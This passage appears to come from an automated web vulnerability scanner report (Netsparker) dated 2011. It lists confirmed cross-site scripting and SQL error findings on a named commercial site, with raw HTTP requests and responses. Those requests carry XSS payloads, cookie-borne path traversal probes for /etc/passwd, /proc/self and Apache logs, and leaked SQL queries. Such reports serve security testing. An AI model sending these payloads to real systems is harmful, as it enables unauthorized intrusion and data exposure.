User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00050D)%3c%2fscript%3e&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:22 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F629F5EE3569B8BB2A496694BB1E1642; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x000547)</script>

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000547)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g7vscnkspqm6768cii4hjuotj1; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=20001&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000547)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000547)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/

/ppc/leadflow/phsy00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x00054C)</script>

Request

GET /ppc/leadflow/phsy00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00054C)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nas9u8dk8gd7kbcol4ichotvc6; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00054C)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/

/ppc/leadflow/wede00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/?'"--></style></script><script>alert(0x000557)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000557)</script>

Request

GET /ppc/leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o0v0volns4qvantbl87sib7nv5; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000557)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E

/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x00055D)</script>

Request

GET /ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00055D)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
